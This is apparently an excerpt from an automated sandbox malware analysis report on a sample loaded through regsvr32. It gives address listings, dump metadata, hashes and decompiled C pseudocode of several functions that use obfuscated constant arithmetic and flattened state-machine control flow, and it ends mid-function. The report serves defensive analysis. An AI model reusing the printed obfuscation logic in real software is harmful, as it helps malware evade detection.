0x04b3b99f
0x04b3b9a7
0x04b3b9af
0x04b3b9bd
0x04b3b9c1
0x04b3b9c9
0x04b3b9d1
0x04b3b9d9
0x04b3b9e9
0x04b3b9ee
0x04b3b9f4
0x04b3b9fc
0x04b3ba01
0x04b3ba09
0x04b3ba15
0x04b3ba18
0x04b3ba1c
0x04b3ba96
0x04b3ba96
0x04b3ba9a
0x00000000
0x00000000
0x04b3ba29
0x04b3ba7c
0x04b3ba8d
0x04b3ba8f
0x04b3ba2b
0x04b3ba3f
0x04b3ba44
0x04b3ba4b
0x04b3baa4
0x04b3ba4d
0x04b3ba52
0x04b3ba64
0x04b3ba74
0x04b3ba79
0x00000000
0x04b3ba79
0x04b3ba4b
0x04b3ba29
0x04b3baa3

Strings

v-, xrefs: 04B3BA01
$P, xrefs: 04B3B83F
Ei, xrefs: 04B3B835

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$Ei$v-
API String ID: 0-1888193988
Opcode ID: 0c23fb1e4151efea18a22f97807edd3b2accb9c600c4460dfcf34c90e5208e79
Instruction ID: 69ab5ea6133473413186faa0d25869b831af9445001ce98317f15f1f6bcb904f
Opcode Fuzzy Hash: 0c23fb1e4151efea18a22f97807edd3b2accb9c600c4460dfcf34c90e5208e79
Instruction Fuzzy Hash: 9E6124B15083809FD394CF25D58980BFBF1FBC8718F409A1DF19656260D7B5AA1ACF46

Uniqueness

Uniqueness Score: -1.00%

Function 04B507AA, Relevance: 3.9, Strings: 3, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04B507AA(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t127;
				void* _t143;
				void* _t147;
				intOrPtr _t159;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int* _t172;

				_t145 = _a12;
				_t164 = _a4;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E04B4FE29(_t127);
				_v68 = 0xce0704;
				_t172 =  &(( &_v80)[5]);
				_t165 = 0;
				_t147 = 0xeb10c15;
				_t166 = 0x21;
				_v68 = _v68 / _t166;
				_v68 = _v68 ^ 0x27d6a24c;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x13812000;
				_v56 = 0x3987d6;
				_v56 = _v56 + 0xffffa396;
				_v56 = _v56 << 6;
				_v56 = _v56 + 0xffffda2f;
				_v56 = _v56 ^ 0x0e4ab52f;
				_v76 = 0xda5b69;
				_v76 = _v76 + 0xffffc444;
				_v76 = _v76 >> 3;
				_v76 = _v76 | 0xf293bfd0;
				_v76 = _v76 ^ 0xf29c223d;
				_v80 = 0x3698bd;
				_v80 = _v80 << 2;
				_v80 = _v80 + 0xffffb830;
				_v80 = _v80 | 0x7cee6fd8;
				_v80 = _v80 ^ 0x7cfe3832;
				_v44 = 0x3a6f25;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x000731a8;
				_v48 = 0xdbe73e;
				_v48 = _v48 | 0x7450ea9d;
				_v48 = _v48 ^ 0x74de2fdf;
				_v36 = 0x16da79;
				_t167 = 0x12;
				_v36 = _v36 * 0x5d;
				_v36 = _v36 ^ 0x084db146;
				_v60 = 0xec6235;
				_v60 = _v60 + 0x184b;
				_v60 = _v60 / _t167;
				_v60 = _v60 | 0x0c30d5fb;
				_v60 = _v60 ^ 0x0c38efee;
				_v64 = 0x38c801;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0xc825be84;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 ^ 0x000d1c3b;
				_v72 = 0xe77e6e;
				_v72 = _v72 + 0xffffb3b2;
				_v72 = _v72 << 0xd;
				_t168 = 0x78;
				_v72 = _v72 / _t168;
				_v72 = _v72 ^ 0x01e31a81;
				_v40 = 0x7e766a;
				_v40 = _v40 * 0x26;
				_v40 = _v40 ^ 0x12c7afcd;
				_v52 = 0xe103b8;
				_t169 = 0x4e;
				_v52 = _v52 / _t169;
				_v52 = _v52 + 0xffff4b52;
				_v52 = _v52 ^ 0x000d8548;
				do {
					while(_t147 != 0x8d72c38) {
						if(_t147 == 0xc75b0cb) {
							_t143 = E04B357B8( *_t164, _v76, _v80,  *((intOrPtr*)(_t164 + 4)), _v44,  &_v32, _v48);
							_t172 =  &(_t172[6]);
							if(_t143 != 0) {
								_t147 = 0x8d72c38;
								continue;
							}
						} else {
							if(_t147 != 0xeb10c15) {
								goto L8;
							} else {
								_t147 = 0xc75b0cb;
								continue;
							}
						}
						goto L9;
					}
					_t159 =  *0x4b56224; // 0x0
					E04B54D53( *((intOrPtr*)(_t145 + 4)),  *((intOrPtr*)(_t159 + 0x48)), _v36, _t147,  &_v32, _v60, _v64, _v68, _v72, _v40, _t147,  *_t145, _v52);
					_t172 =  &(_t172[0xb]);
					_t147 = 0x3b36d39;
					_t165 =  ==  ? 1 : _t165;
					L8:
				} while (_t147 != 0x3b36d39);
				L9:
				return _t165;
			}

0x04b507ae
0x04b507b5
0x04b507b9
0x04b507ba
0x04b507be
0x04b507bf
0x04b507c1
0x04b507c6
0x04b507ce
0x04b507d7
0x04b507d9
0x04b507e0
0x04b507e5
0x04b507eb
0x04b507f3
0x04b507f8
0x04b50800
0x04b50808
0x04b50810
0x04b50815
0x04b5081d
0x04b50825
0x04b5082d
0x04b50835
0x04b5083a
0x04b50842
0x04b5084a
0x04b50852
0x04b50857
0x04b5085f
0x04b50867
0x04b5086f
0x04b50877
0x04b5087c
0x04b50884
0x04b5088c
0x04b50894
0x04b5089c
0x04b508a9
0x04b508ac
0x04b508b0
0x04b508b8
0x04b508c0
0x04b508d0
0x04b508d4
0x04b508dc
0x04b508e4
0x04b508ec
0x04b508f1
0x04b508f9
0x04b508fe
0x04b50906
0x04b5090e
0x04b50916
0x04b5091f
0x04b50922
0x04b50926
0x04b5092e
0x04b5093b
0x04b5093f
0x04b50947
0x04b50957
0x04b5095f
0x04b50963
0x04b5096b
0x04b50973
0x04b50973
0x04b5097d
0x04b509a8
0x04b509ad
0x04b509b2
0x04b509b4
0x00000000
0x04b509b4
0x04b5097f
0x04b50985
0x00000000
0x04b50987
0x04b50987
0x00000000
0x04b50987
0x04b50985
0x00000000
0x04b5097d
0x04b509dd
0x04b509e9
0x04b509f7
0x04b509fc
0x04b50a01
0x04b50a04
0x04b50a04
0x04b50a11
0x04b50a19

Strings

jv~, xrefs: 04B5092E
n~, xrefs: 04B50906
5b, xrefs: 04B508B8

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5b$jv~$n~
API String ID: 0-1119068381
Opcode ID: 0be675f7f9323e853c3445ad6ceef7ca38cff58851472c1f2044f5667af49494
Instruction ID: 76339e2648cd1f79f3ffdd52a2d572fb6fa8ab8fa8b91d32ebbedf7ee2de33d3
Opcode Fuzzy Hash: 0be675f7f9323e853c3445ad6ceef7ca38cff58851472c1f2044f5667af49494
Instruction Fuzzy Hash: B45143724083059BC748DF25C98991FFBE1FBC8758F508A1DF696A6220D371DA898F46

Uniqueness

Uniqueness Score: -1.00%

Function 04B37442, Relevance: 3.9, Strings: 3, Instructions: 116
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E04B37442(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				void* _t68;
				intOrPtr _t81;
				signed int _t82;
				signed int _t87;
				signed int _t88;
				void* _t91;
				intOrPtr _t105;
				intOrPtr* _t106;
				void* _t107;
				signed int* _t111;

				_push(_a16);
				_t106 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04B4FE29(_t68);
				_v24 = 0x62b98c;
				_t111 =  &(( &_v28)[6]);
				_t107 = 0;
				_t91 = 0x56d49db;
				_t87 = 0x32;
				_v24 = _v24 * 0x4b;
				_v24 = _v24 / _t87;
				_v24 = _v24 + 0xffff2f8c;
				_v24 = _v24 ^ 0x009a9eb5;
				_v16 = 0xcd53e2;
				_t88 = 0x3a;
				_v16 = _v16 * 0x65;
				_v16 = _v16 + 0xffffa8ae;
				_v16 = _v16 ^ 0x510428a2;
				_v28 = 0xd5f3ee;
				_v28 = _v28 ^ 0x77e73800;
				_v28 = _v28 / _t88;
				_v28 = _v28 >> 7;
				_v28 = _v28 ^ 0x0000e246;
				_v20 = 0x9cb423;
				_v20 = _v20 + 0x5dad;
				_v20 = _v20 ^ 0xe88d7dca;
				_v20 = _v20 ^ 0xe81c7203;
				_v4 = 0x5f6be5;
				_t46 =  &_v4; // 0x5f6be5
				_v4 =  *_t46 * 0x5c;
				_v4 = _v4 ^ 0x224497bb;
				_v8 = 0xac6149;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x0020023e;
				_v12 = 0x405ac1;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x000eeb29;
				do {
					while(_t91 != 0x56d49db) {
						if(_t91 == 0x845f35b) {
							_t82 = E04B40F86(_t106);
							asm("sbb ecx, ecx");
							_t91 = ( ~_t82 & 0xfe625aa0) + 0xd9296b1;
							continue;
						} else {
							if(_t91 == 0xbb8a3c5) {
								E04B40D04();
								_t91 = 0xd9296b1;
								continue;
							} else {
								if(_t91 == 0xbf4f151) {
									if(E04B48FAE(_a4) != 0) {
										_t107 = 1;
									} else {
										_t91 = 0xbb8a3c5;
										continue;
									}
								} else {
									if(_t91 != 0xd9296b1) {
										goto L12;
									} else {
										_t105 =  *0x4b56224; // 0x0
										L04B52B09(_v4, _t105, _v8, _v12);
									}
								}
							}
						}
						L15:
						return _t107;
					}
					_push(_t91);
					_push(_t91);
					_t81 = E04B3C5D8(0x64);
					_t111 =  &(_t111[3]);
					 *0x4b56224 = _t81;
					_t91 = 0x845f35b;
					L12:
				} while (_t91 != 0xd85fda5);
				goto L15;
			}

0x04b37449
0x04b3744d
0x04b3744f
0x04b37453
0x04b37457
0x04b3745c
0x04b3745d
0x04b37462
0x04b3746a
0x04b37474
0x04b37476
0x04b37482
0x04b37483
0x04b3748f
0x04b37495
0x04b3749d
0x04b374a5
0x04b374b2
0x04b374b3
0x04b374b7
0x04b374bf
0x04b374c7
0x04b374cf
0x04b374e2
0x04b374e6
0x04b374eb
0x04b374f3
0x04b374fb
0x04b37503
0x04b3750b
0x04b37513
0x04b3751b
0x04b37520
0x04b37524
0x04b3752c
0x04b37534
0x04b37539
0x04b37541
0x04b37549
0x04b3754e
0x04b37556
0x04b37556
0x04b37564
0x04b375ad
0x04b375b6
0x04b375be
0x00000000
0x04b37566
0x04b37568
0x04b375a2
0x04b375a7
0x00000000
0x04b3756a
0x04b37570
0x04b3759c
0x04b375f8
0x04b3759e
0x04b3759e
0x00000000
0x04b3759e
0x04b37572
0x04b37574
0x00000000
0x04b37576
0x04b3757e
0x04b37588
0x04b3758e
0x04b37574
0x04b37570
0x04b37568
0x04b375fa
0x04b37602
0x04b37602
0x04b375d2
0x04b375d3
0x04b375d6
0x04b375db
0x04b375de
0x04b375e3
0x04b375e8
0x04b375e8
0x00000000

Strings

K3xq, xrefs: 04B37446
F, xrefs: 04B374EB
k_, xrefs: 04B3751B

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: F$K3xq$k_
API String ID: 0-3174058581
Opcode ID: 70a0e1d49eed46d4d704d0939e87729d037b2867e9475648fbb9d340422612a0
Instruction ID: 614fda65c36a48a7dce9128ae2325a4fb50a15c961318e5dd36f119d6fec629b
Opcode Fuzzy Hash: 70a0e1d49eed46d4d704d0939e87729d037b2867e9475648fbb9d340422612a0
Instruction Fuzzy Hash: 2941EEB16083028FD718DF25D48592FBBE1FBC8358F004A5EF58696261DB70DA08CB93

Uniqueness

Uniqueness Score: -1.00%

Function 1001FC43, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1001FC43(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E1001BD6F());
				 *0x1005b670 = 0;
				return _t8;
			}

0x1001fc48
0x1001fc58
0x1001fc5e
0x1001fc65

APIs

__decode_pointer.LIBCMT ref: 1001FC51

Part of subcall function 1001BD6F: TlsGetValue.KERNEL32(?,1001C0FD,00000000,00000000,10017A84,00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840), ref: 1001BD7C
Part of subcall function 1001BD6F: TlsGetValue.KERNEL32(00000006,?,1001C0FD,00000000,00000000,10017A84,00000000,?,?,00000001,?,?,10017AE8,00000001), ref: 1001BD93

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001FC58

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Value$ExceptionFilterUnhandled__decode_pointer
String ID:
API String ID: 1958600898-0
Opcode ID: c0118062e478c14860ac704cd26963d59993939b078219122e56b5b05da27951
Instruction ID: 8c383471f53841a55e0fcdb182c1f4564aa38491823c170ddba15b1e5c66fe32
Opcode Fuzzy Hash: c0118062e478c14860ac704cd26963d59993939b078219122e56b5b05da27951
Instruction Fuzzy Hash: E0C04C59818ED49AE715DF745C9D70D7F14E712508FD40589D480851A2DE6CA049C931

Uniqueness

Uniqueness Score: -1.00%

Function 04B4AD08, Relevance: 2.7, Strings: 2, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B4AD08() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t263;
				intOrPtr _t264;
				intOrPtr _t267;
				void* _t273;
				void* _t277;
				intOrPtr _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int* _t322;

				_t322 =  &_v1144;
				_v1052 = 0x3e8be7;
				_t310 = 0;
				_t277 = 0xe4a3d19;
				_v1048 = 0;
				_v1044 = 0;
				_v1100 = 0x8001b8;
				_t311 = 0x1c;
				_v1100 = _v1100 / _t311;
				_v1100 = _v1100 + 0x9b02;
				_v1100 = _v1100 ^ 0x0003825e;
				_v1104 = 0x6ba50e;
				_v1104 = _v1104 + 0x86a8;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0xb0a58b81;
				_v1064 = 0xa5f60f;
				_v1064 = _v1064 ^ 0xf15b406a;
				_v1064 = _v1064 ^ 0xf1fbbabe;
				_v1116 = 0xfce2df;
				_v1116 = _v1116 ^ 0xb7cf3da1;
				_v1116 = _v1116 + 0x963f;
				_v1116 = _v1116 ^ 0x6f9af2b2;
				_v1116 = _v1116 ^ 0xd8ae206e;
				_v1132 = 0x6fbbde;
				_v1132 = _v1132 | 0xe49a2ecd;
				_v1132 = _v1132 + 0xd857;
				_v1132 = _v1132 + 0xffffaa9b;
				_v1132 = _v1132 ^ 0xe507ae81;
				_v1096 = 0xa4704d;
				_v1096 = _v1096 + 0x7787;
				_t312 = 0x67;
				_v1096 = _v1096 / _t312;
				_v1096 = _v1096 ^ 0x00025cd8;
				_v1084 = 0x38937;
				_t313 = 0x79;
				_v1084 = _v1084 * 0x4f;
				_v1084 = _v1084 ^ 0x5b1a1bbe;
				_v1084 = _v1084 ^ 0x5a043b4e;
				_v1136 = 0x1276ee;
				_v1136 = _v1136 + 0xffffa0e4;
				_v1136 = _v1136 + 0xffff74bb;
				_v1136 = _v1136 << 2;
				_v1136 = _v1136 ^ 0x0044c443;
				_v1068 = 0xe79065;
				_v1068 = _v1068 << 0xc;
				_v1068 = _v1068 + 0xcbe6;
				_v1068 = _v1068 ^ 0x7908daa4;
				_v1088 = 0x9a4bed;
				_v1088 = _v1088 + 0xfffff274;
				_v1088 = _v1088 + 0xb36d;
				_v1088 = _v1088 ^ 0x00951f6d;
				_v1144 = 0x62e226;
				_v1144 = _v1144 ^ 0x3dd3a3b2;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff6a42;
				_v1144 = _v1144 ^ 0x0008f37a;
				_v1108 = 0x394fd6;
				_v1108 = _v1108 * 0x13;
				_v1108 = _v1108 / _t313;
				_v1108 = _v1108 ^ 0x00080299;
				_v1120 = 0x93d07f;
				_v1120 = _v1120 << 0xa;
				_t314 = 5;
				_v1120 = _v1120 / _t314;
				_v1120 = _v1120 ^ 0x44bcf5d7;
				_v1120 = _v1120 ^ 0x4b68940f;
				_v1072 = 0xc1f636;
				_v1072 = _v1072 | 0x86bbf578;
				_t315 = 0x47;
				_v1072 = _v1072 * 0x24;
				_v1072 = _v1072 ^ 0xfb68157e;
				_v1080 = 0x3ac036;
				_v1080 = _v1080 + 0xffffbaa8;
				_v1080 = _v1080 ^ 0x136d94c6;
				_v1080 = _v1080 ^ 0x1353f0eb;
				_v1128 = 0xb3095e;
				_v1128 = _v1128 / _t315;
				_v1128 = _v1128 | 0xf7128eca;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x0004e558;
				_v1076 = 0x73500f;
				_v1076 = _v1076 | 0x9d7bc413;
				_v1076 = _v1076 + 0xffff6f55;
				_v1076 = _v1076 ^ 0x9d72e045;
				_v1124 = 0xc98916;
				_v1124 = _v1124 + 0x2b72;
				_v1124 = _v1124 | 0x4777986b;
				_t316 = 0x69;
				_v1124 = _v1124 / _t316;
				_v1124 = _v1124 ^ 0x00ab5a68;
				_v1140 = 0xc8b3ea;
				_t317 = 0x7e;
				_v1140 = _v1140 / _t317;
				_v1140 = _v1140 | 0x89e2a6fa;
				_v1140 = _v1140 >> 4;
				_v1140 = _v1140 ^ 0x08902903;
				_v1092 = 0x846906;
				_v1092 = _v1092 | 0x1b02230c;
				_v1092 = _v1092 + 0xffff209e;
				_v1092 = _v1092 ^ 0x1b8bec31;
				_v1056 = 0xaf8c32;
				_t318 = 0x2e;
				_v1056 = _v1056 / _t318;
				_v1056 = _v1056 ^ 0x00017103;
				_v1060 = 0x7e9355;
				_v1060 = _v1060 >> 0x10;
				_v1060 = _v1060 ^ 0x0008a840;
				_v1112 = 0x76e6c0;
				_v1112 = _v1112 ^ 0x1858c3ee;
				_t319 = 0x68;
				_v1112 = _v1112 / _t319;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0x000255a3;
				do {
					while(_t277 != 0xc59040) {
						if(_t277 == 0x420aa66) {
							_push(_v1084);
							_push(_v1096);
							_push(_v1132);
							_t263 = E04B4E1F8(0x4b31000, _v1116, __eflags);
							_t264 =  *0x4b56214; // 0x0
							_t267 =  *0x4b56214; // 0x0
							E04B52D0A(_v1068, __eflags, _t267 + 0x23c, _v1088, _v1144, _v1108, 0x4b31000,  &_v1040, _t264 + 0x34, _t263);
							E04B4FECB(_t263, _v1120, _v1072, _v1080, _v1128);
							_t322 =  &(_t322[0xe]);
							_t277 = 0x835dcf5;
							continue;
						} else {
							if(_t277 == 0x835dcf5) {
								_t273 = E04B4654A(_v1076, _v1124, __eflags,  &_v520, _v1140,  &_v1040);
								_t322 =  &(_t322[3]);
								__eflags = _t273;
								_t310 =  !=  ? 1 : _t310;
								_t277 = 0xb7cde49;
								continue;
							} else {
								if(_t277 == 0xb7cde49) {
									L04B47A0F(_v1092,  &_v1040, _v1056, _v1060, _v1112);
								} else {
									if(_t277 != 0xe4a3d19) {
										goto L10;
									} else {
										_t277 = 0xc59040;
										continue;
									}
								}
							}
						}
						L13:
						return _t310;
					}
					E04B50DB1(_v1100,  &_v520, __eflags, _v1104, _t277, _v1064);
					_t322 =  &(_t322[3]);
					_t277 = 0x420aa66;
					L10:
					__eflags = _t277 - 0xd159d29;
				} while (__eflags != 0);
				goto L13;
			}

0x04b4ad08
0x04b4ad0e
0x04b4ad1c
0x04b4ad1e
0x04b4ad23
0x04b4ad27
0x04b4ad2b
0x04b4ad39
0x04b4ad3e
0x04b4ad44
0x04b4ad4c
0x04b4ad54
0x04b4ad5c
0x04b4ad64
0x04b4ad69
0x04b4ad71
0x04b4ad79
0x04b4ad81
0x04b4ad89
0x04b4ad91
0x04b4ad99
0x04b4ada1
0x04b4ada9
0x04b4adb1
0x04b4adb9
0x04b4adc1
0x04b4adc9
0x04b4add1
0x04b4add9
0x04b4ade1
0x04b4aded
0x04b4adf2
0x04b4adf8
0x04b4ae00
0x04b4ae0d
0x04b4ae0e
0x04b4ae12
0x04b4ae1a
0x04b4ae22
0x04b4ae2a
0x04b4ae32
0x04b4ae3a
0x04b4ae3f
0x04b4ae47
0x04b4ae4f
0x04b4ae54
0x04b4ae5c
0x04b4ae64
0x04b4ae6c
0x04b4ae74
0x04b4ae7c
0x04b4ae84
0x04b4ae8c
0x04b4ae94
0x04b4ae99
0x04b4aea1
0x04b4aea9
0x04b4aeb6
0x04b4aec0
0x04b4aec4
0x04b4aecc
0x04b4aed4
0x04b4aee1
0x04b4aee6
0x04b4aeec
0x04b4aef9
0x04b4af06
0x04b4af0e
0x04b4af1b
0x04b4af1e
0x04b4af22
0x04b4af2a
0x04b4af32
0x04b4af3a
0x04b4af42
0x04b4af4a
0x04b4af5a
0x04b4af5e
0x04b4af66
0x04b4af6b
0x04b4af73
0x04b4af7b
0x04b4af83
0x04b4af8b
0x04b4af93
0x04b4af9b
0x04b4afa3
0x04b4afaf
0x04b4afb4
0x04b4afba
0x04b4afc2
0x04b4afce
0x04b4afd3
0x04b4afd9
0x04b4afe1
0x04b4afe6
0x04b4afee
0x04b4aff6
0x04b4affe
0x04b4b006
0x04b4b00e
0x04b4b01a
0x04b4b01f
0x04b4b025
0x04b4b02d
0x04b4b035
0x04b4b03a
0x04b4b042
0x04b4b04a
0x04b4b056
0x04b4b059
0x04b4b05d
0x04b4b062
0x04b4b06a
0x04b4b06a
0x04b4b074
0x04b4b0ca
0x04b4b0d3
0x04b4b0d7
0x04b4b0df
0x04b4b0e9
0x04b4b108
0x04b4b11b
0x04b4b135
0x04b4b13a
0x04b4b13d
0x00000000
0x04b4b076
0x04b4b07c
0x04b4b0b3
0x04b4b0ba
0x04b4b0be
0x04b4b0c0
0x04b4b0c3
0x00000000
0x04b4b07e
0x04b4b084
0x04b4b187
0x04b4b08a
0x04b4b090
0x00000000
0x04b4b096
0x04b4b096
0x00000000
0x04b4b096
0x04b4b090
0x04b4b084
0x04b4b07c
0x04b4b18f
0x04b4b19b
0x04b4b19b
0x04b4b15b
0x04b4b160
0x04b4b163
0x04b4b165
0x04b4b165
0x04b4b165
0x00000000

Strings

r+, xrefs: 04B4AF9B
&b, xrefs: 04B4AE84

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: &b$r+
API String ID: 0-3016113347
Opcode ID: 6d0718f60b3a8fa2ecf0f02674c0e980ce0bf75be20b7b68ee879c01284c3cab
Instruction ID: 2334d4009265a2232418b0a9e26eadaac93a47f3dca29468b1d34b4eaac67dbc
Opcode Fuzzy Hash: 6d0718f60b3a8fa2ecf0f02674c0e980ce0bf75be20b7b68ee879c01284c3cab
Instruction Fuzzy Hash: D3C141B15083409FD3A8CF66C88990BFBE1FBD4758F108A5DF29686260D7B5D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B44F74, Relevance: 2.7, Strings: 2, Instructions: 199
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B44F74() {
				char _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				short* _t210;
				void* _t211;
				intOrPtr _t213;
				void* _t217;
				intOrPtr _t224;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int* _t254;

				_t254 =  &_v604;
				_v528 = 0xeac4cc;
				_v528 = _v528 | 0xab847aec;
				_t217 = 0x3550051;
				_v528 = _v528 ^ 0xabe53c27;
				_v564 = 0x85ed10;
				_v564 = _v564 << 0xe;
				_v564 = _v564 | 0x02c2a82c;
				_v564 = _v564 ^ 0x7bc732f4;
				_v548 = 0x432dfc;
				_v548 = _v548 ^ 0x2e419a47;
				_v548 = _v548 ^ 0x2e0248f0;
				_v556 = 0x7b6619;
				_t246 = 0x1c;
				_v556 = _v556 / _t246;
				_v556 = _v556 << 0x10;
				_v556 = _v556 ^ 0x68371ab0;
				_v568 = 0x76f94b;
				_t247 = 7;
				_v568 = _v568 / _t247;
				_v568 = _v568 << 0xd;
				_v568 = _v568 ^ 0x1fed9d10;
				_v572 = 0x34fb4;
				_t248 = 0xf;
				_v572 = _v572 * 0x24;
				_v572 = _v572 >> 0xa;
				_v572 = _v572 ^ 0x0007943f;
				_v536 = 0xc9a576;
				_v536 = _v536 + 0xffff9d44;
				_v536 = _v536 ^ 0x00c7b609;
				_v596 = 0xae9ff5;
				_v596 = _v596 + 0xffff6f16;
				_v596 = _v596 / _t248;
				_v596 = _v596 ^ 0xfe5a1390;
				_v596 = _v596 ^ 0xfe515394;
				_v588 = 0xa8ac90;
				_t249 = 0x17;
				_v588 = _v588 / _t249;
				_v588 = _v588 << 4;
				_v588 = _v588 + 0xfffff77b;
				_v588 = _v588 ^ 0x007f9eed;
				_v600 = 0xc58072;
				_v600 = _v600 + 0xffffcbc9;
				_v600 = _v600 << 4;
				_v600 = _v600 * 0x72;
				_v600 = _v600 ^ 0x7db93259;
				_v604 = 0x4fbb0c;
				_v604 = _v604 << 0xa;
				_v604 = _v604 << 7;
				_v604 = _v604 * 0x27;
				_v604 = _v604 ^ 0xfda02730;
				_v544 = 0x5fc89d;
				_v544 = _v544 | 0x6496792e;
				_v544 = _v544 ^ 0x64dc06aa;
				_v580 = 0xa4bd54;
				_v580 = _v580 + 0xffff47e7;
				_v580 = _v580 >> 0x10;
				_v580 = _v580 + 0xffff9f11;
				_v580 = _v580 ^ 0xfff905b7;
				_v560 = 0x8ec0a6;
				_v560 = _v560 ^ 0x51bd2871;
				_t250 = 0x75;
				_v560 = _v560 / _t250;
				_v560 = _v560 ^ 0x00b97c8d;
				_v584 = 0x6990b8;
				_v584 = _v584 ^ 0x9d650ba3;
				_v584 = _v584 ^ 0x6675860f;
				_v584 = _v584 + 0xffff1bcf;
				_v584 = _v584 ^ 0xfb748c23;
				_v592 = 0xef0f92;
				_v592 = _v592 ^ 0x945975ed;
				_v592 = _v592 + 0xffff8646;
				_v592 = _v592 + 0xfffff2e1;
				_v592 = _v592 ^ 0x94bb4d80;
				_v552 = 0xcb75d7;
				_t251 = 0x65;
				_v552 = _v552 * 0x6f;
				_v552 = _v552 ^ 0xe1e1c84b;
				_v552 = _v552 ^ 0xb9d9c47b;
